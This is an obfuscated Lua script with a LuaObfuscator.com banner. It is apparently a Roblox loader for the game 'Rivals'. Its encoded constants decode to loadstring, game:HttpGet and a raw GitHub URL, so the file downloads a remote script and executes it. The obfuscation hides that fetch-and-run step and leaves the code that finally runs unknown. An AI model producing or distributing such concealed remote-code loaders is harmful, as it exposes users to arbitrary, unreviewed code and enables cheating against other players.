--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.9) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v86=v2(v0(v30,16));if v19 then local v110=v5(v86,v19);v19=nil;return v110;else return v86;end end end);local function v20(v31,v32,v33) if v33 then local v87=0 + (957 -(892 + 65)) ;local v88;while true do if (v87==(0 -0)) then v88=(v31/((1 + 1)^(v32-(2 -1))))%((5 -(5 -2))^(((v33-(1 -0)) -(v32-(2 -(1 -0)))) + (1066 -(68 + 997)))) ;return v88-(v88%(620 -(555 + 64))) ;end end else local v89=(8 -6)^(v32-(932 -(857 + (424 -(87 + 263))))) ;return (((v31%(v89 + v89))>=v89) and (569 -(367 + 201))) or (927 -(214 + 713)) ;end end local function v21() local v34=180 -(67 + 113) ;local v35;while true do if (v34==(3 -2)) then return v35;end if (v34==(0 + 0)) then v35=v1(v16,v18,v18);v18=v18 + (2 -1) ;v34=1 + 0 ;end end end local function v22() local v36=952 -(802 + 150) ;local v37;local v38;while true do if (v36==(2 -1)) then return (v38 * (464 -208)) + v37 ;end if (v36==((0 -0) + 0)) then v37,v38=v1(v16,v18,v18 + (999 -(915 + 82)) );v18=v18 + (5 -3) ;v36=(1188 -(1069 + 118)) + 0 ;end end end local function v23() local v39,v40,v41,v42=v1(v16,v18,v18 + (6 -3) );v18=v18 + (8 -4) ;return (v42 * 16777216) + (v41 * (11394 + 54142)) + (v40 * (454 -198)) + v39 ;end local function v24() local v43=v23();local v44=v23();local v45=1 + 0 + 0 ;local v46=(v20(v44,792 -(368 + 423) ,62 -42 ) * ((20 -(10 + 8))^(122 -90))) + v43 ;local v47=v20(v44,463 -(416 + 26) ,98 -(24 + 43) );local v48=((v20(v44,14 + (903 -(261 + 624)) )==(1 -0)) and  -(439 -(145 + 293))) or (431 -((77 -33) + 386)) ;if (v47==(1486 -(998 + 488))) then if (v46==(0 + 0)) then return v48 * (1080 -(1020 + 60)) ;else v47=1 + 0 ;v45=772 -(201 + 571) ;end elseif (v47==(3185 -(116 + 1022))) then return ((v46==(0 -0)) and (v48 * (((1424 -(630 + 793)) + 0)/((0 -0) -0)))) or (v48 * NaN) ;end return v8(v48,v47-(3632 -2609) ) * (v45 + (v46/((861 -((3854 -3040) + 45))^(127 -75)))) ;end local function v25(v49) local v50=0 + 0 + 0 ;local v51;local v52;while true do if (v50==(9 -6)) then return v6(v52);end if (v50==(1749 -(760 + 987))) then v52={};for v111=1914 -(1789 + 124) , #v51 do v52[v111]=v2(v1(v3(v51,v111,v111)));end v50=3;end if (v50==(767 -(745 + 21))) then v51=v3(v16,v18,(v18 + v49) -(1 + (1055 -(87 + 968))) );v18=v18 + v49 ;v50=(22 -17) -3 ;end if (v50==(0 -0)) then v51=nil;if  not v49 then v49=v23();if (v49==(0 + 0 + 0)) then return "";end end v50=2 -1 ;end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v53=(function() return function(v90,v91,v92,v93,v94,v95,v96,v97) local v90=(function() return 0;end)();local v91=(function() return;end)();local v92=(function() return;end)();while true do if (v90== #":") then if (v91== #"[") then v92=(function() return v93()~=(1456 -(282 + 1174)) ;end)();elseif (v91==(3 -1)) then v92=(function() return v94();end)();elseif (v91~= #"asd") then else v92=(function() return v95();end)();end v96[v97]=(function() return v92;end)();break;end if (v90==0) then local v118=(function() return 0 -0 ;end)();local v119=(function() return;end)();while true do if (v118~=0) then else v119=(function() return 0;end)();while true do if (v119==(1990 -(582 + 1408))) then v91=(function() return v93();end)();v92=(function() return nil;end)();v119=(function() return 3 -2 ;end)();end if ((1 -0)==v119) then v90=(function() return  #"]";end)();break;end end break;end end end end return v90,v91,v92,v93,v94,v95,v96,v97;end;end)();local v54=(function() return function(v98,v99,v100) local v101=(function() return 1251 -(721 + 530) ;end)();local v102=(function() return;end)();while true do if (v101==(0 -0)) then v102=(function() return 0 -0 ;end)();while true do if ((1824 -(1195 + 629))==v102) then v98[v99-#"~" ]=(function() return v100();end)();return v98,v99,v100;end end break;end end end;end)();local v55=(function() return {};end)();local v56=(function() return {};end)();local v57=(function() return {};end)();local v58=(function() return {v55,v56,nil,v57};end)();local v59=(function() return v23();end)();local v60=(function() return {};end)();for v68= #"}",v59 do FlatIdent_5ED46,Type,Cons,v21,v24,v25,v60,v68=(function() return v53(FlatIdent_5ED46,Type,Cons,v21,v24,v25,v60,v68);end)();end v58[ #"-19"]=(function() return v21();end)();for v69= #":",v23() do local v70=(function() return v21();end)();if (v20(v70, #" ", #">")==(0 -0)) then local v105=(function() return 0 + 0 ;end)();local v106=(function() return;end)();local v107=(function() return;end)();local v108=(function() return;end)();local v109=(function() return;end)();while true do if (v105==(1502 -(1408 + 92))) then while true do if (v106== #"[") then local v127=(function() return 1086 -(461 + 625) ;end)();local v128=(function() return;end)();while true do if (v127~=(1288 -(993 + 295))) then else v128=(function() return 241 -(187 + 54) ;end)();while true do if (v128~=(780 -(162 + 618))) then else v109=(function() return {v22(),v22(),nil,nil};end)();if (v107==(0 + 0)) then local v173=(function() return 0 + 0 ;end)();local v174=(function() return;end)();while true do if (v173==(0 + 0)) then v174=(function() return 0 -0 ;end)();while true do if (v174==(0 + 0)) then v109[ #"-19"]=(function() return v22();end)();v109[ #"xnxx"]=(function() return v22();end)();break;end end break;end end elseif (v107== #"\\") then v109[ #"91("]=(function() return v23();end)();elseif (v107==2) then v109[ #"asd"]=(function() return v23() -(2^16) ;end)();elseif (v107== #"91(") then local v182=(function() return 0 + 0 ;end)();local v183=(function() return;end)();while true do if ((0 -0)==v182) then v183=(function() return 0 + 0 ;end)();while true do if (v183==0) then v109[ #"-19"]=(function() return v23() -((1638 -(1373 + 263))^(1016 -(451 + 549))) ;end)();v109[ #".com"]=(function() return v22();end)();break;end end break;end end end v128=(function() return 1 + 0 ;end)();end if (v128~=(1 + 0)) then else v106=(function() return 2;end)();break;end end break;end end end if (v106==(2 -0)) then local v129=(function() return 0;end)();while true do if (v129==(1 -0)) then v106=(function() return  #"gha";end)();break;end if (v129~=(1145 -(466 + 679))) then else if (v20(v108, #",", #"<")~= #".") then else v109[1386 -(746 + 638) ]=(function() return v60[v109[1 + 1 ]];end)();end if (v20(v108,4 -2 ,2 -0 )== #"/") then v109[ #"xnx"]=(function() return v60[v109[ #"nil"]];end)();end v129=(function() return 1;end)();end end end if (v106== #"gha") then if (v20(v108, #"nil", #"91(")~= #".") then else v109[ #"asd1"]=(function() return v60[v109[ #"0313"]];end)();end v55[v69]=(function() return v109;end)();break;end if (v106~=0) then else local v131=(function() return 0 -0 ;end)();local v132=(function() return;end)();while true do if (v131==(1900 -(106 + 1794))) then v132=(function() return 0;end)();while true do if (v132==(1 + 0)) then v106=(function() return  #"<";end)();break;end if (v132==(341 -(218 + 123))) then v107=(function() return v20(v70,1583 -(1535 + 46) , #"gha");end)();v108=(function() return v20(v70, #"asd1",2 + 4 );end)();v132=(function() return 1 + 0 ;end)();end end break;end end end end break;end if ((0 -0)==v105) then local v122=(function() return 0;end)();local v123=(function() return;end)();while true do if ((0 + 0)~=v122) then else v123=(function() return 560 -(306 + 254) ;end)();while true do if (v123~=(1 + 0)) then else v105=(function() return 1 -0 ;end)();break;end if (v123==(584 -(57 + 527))) then v106=(function() return 1467 -(899 + 568) ;end)();v107=(function() return nil;end)();v123=(function() return 1 + 0 ;end)();end end break;end end end if (v105==(1 + 0)) then local v124=(function() return 0 -0 ;end)();local v125=(function() return;end)();while true do if (v124==(0 -0)) then v125=(function() return 603 -(268 + 335) ;end)();while true do if (v125~=(291 -(60 + 230))) then else v105=(function() return 168 -(122 + 44) ;end)();break;end if (v125~=(572 -(426 + 146))) then else v108=(function() return nil;end)();v109=(function() return nil;end)();v125=(function() return 1 + 0 ;end)();end end break;end end end end end end for v71= #".",v23() do v56,v71,v28=(function() return v54(v56,v71,v28);end)();end return v58;end local function v29(v62,v63,v64) local v65=v62[2 -(1 -0) ];local v66=v62[6 -4 ];local v67=v62[3 + 0 ];return function(...) local v72=v65;local v73=v66;local v74=v67;local v75=v27;local v76=1 + 0 ;local v77= -(1 -(0 -0));local v78={};local v79={...};local v80=v12("#",...) -((26 + 40) -(30 + 35)) ;local v81={};local v82={};for v103=0 + 0 ,v80 do if ((v103>=v74) or (1275==4100)) then v78[v103-v74 ]=v79[v103 + 1 + 0 ];else v82[v103]=v79[v103 + (1258 -(1043 + 214)) ];end end local v83=(v80-v74) + 1 ;local v84;local v85;while true do local v104=0;while true do if (v104==(1203 -(373 + (1552 -723)))) then if (v85<=(26 -19)) then if (v85<=(1215 -(323 + 889))) then if ((v85<=(2 -1)) or (1591>=3580)) then if (v85==(580 -(361 + 219))) then v82[v84[322 -((141 -88) + (1494 -(322 + 905))) ]]=v84[1 + 2 ];else local v136=v84[3 -(612 -(602 + 9)) ];v82[v136]=v82[v136](v13(v82,v136 + (414 -(15 + 398)) ,v77));end elseif (v85==(240 -(64 + 174))) then v82[v84[984 -(18 + 964) ]]={};else v82[v84[2 -0 ]]=v64[v84[3]];end elseif (v85<=(18 -13)) then if ((983<=1808) and (v85==(3 + 1))) then v82[v84[2 + (1189 -(449 + 740)) ]]={};else v82[v84[852 -(20 + 830) ]]();end elseif (((3794>3693) and (v85==(5 + 1))) or (2150<=1197)) then v82[v84[2 + 0 ]]=v64[v84[129 -(116 + (882 -(826 + 46))) ]];else local v144=v84[1 + 1 ];v82[v144]=v82[v144](v13(v82,v144 + ((1686 -(245 + 702)) -(542 + (619 -423))) ,v77));end elseif ((3769>=1173) and (v85<=(23 -12))) then if (v85<=(1 + 2 + 6)) then if (v85==(1983 -((3811 -(260 + 1638)) + 62))) then v82[v84[2 + (440 -(382 + 58)) ]]();else do return;end end elseif ((1485==1485) and (v85>(6 + 4))) then local v146=0 + (0 -0) ;local v147;local v148;local v149;local v150;while true do if (v146==(3 -2)) then v77=(v149 + v147) -(1 + 0) ;v150=0 -0 ;v146=3 -1 ;end if (v146==((5 -3) -0)) then for v175=v147,v77 do v150=v150 + (2 -1) ;v82[v175]=v148[v150];end break;end if (v146==(0 + (1205 -(902 + 303)))) then v147=v84[1553 -(1126 + 425) ];v148,v149=v75(v82[v147](v13(v82,v147 + (406 -(118 + 287)) ,v84[11 -8 ])));v146=(2463 -1341) -(118 + 1003) ;end end else local v151=v84[(736 -430) -(244 + 60) ];local v152=v82[v84[3 + 0 + 0 ]];v82[v151 + (477 -((1731 -(1121 + 569)) + 435)) ]=v152;v82[v151]=v152[v84[1005 -(938 + 63) ]];end elseif ((v85<=(38 -25)) or (3315<=2782)) then if (v85==(1137 -(936 + 189))) then do return;end else local v156=v84[1 + 1 ];local v157,v158=v75(v82[v156](v13(v82,v156 + (378 -(142 + 235)) ,v84[13 -10 ])));v77=(v158 + v156) -(1139 -(782 + 356)) ;local v159=0 + 0 ;for v169=v156,v77 do v159=v159 + ((1192 -(22 + 192)) -(553 + 424)) ;v82[v169]=v157[v159];end end elseif (v85>((709 -(483 + 200)) -(1475 -(1404 + 59)))) then v82[v84[2 + 0 ]]=v84[3 + (0 -0) ];else local v162=v84[2];local v163=v82[v84[1878 -((210 -53) + 1718) ]];v82[v162 + 1 + 0 ]=v163;v82[v162]=v163[v84[2 + 2 ]];end v76=v76 + 1 + 0 ;break;end if (v104==(0 -(765 -(468 + 297)))) then v84=v72[v76];v85=v84[2 -1 ];v104=2 -1 ;end end end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q7470476574034A3Q00682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F50737963686F43726F2Q732F526976616C732F726566732F68656164732F6D61696E2F414354454400094Q00047Q001206000100013Q001206000200023Q00200A00020002000300122Q000400044Q000D000200044Q000700013Q00022Q00080001000100012Q00093Q00017Q00",v9(),...);
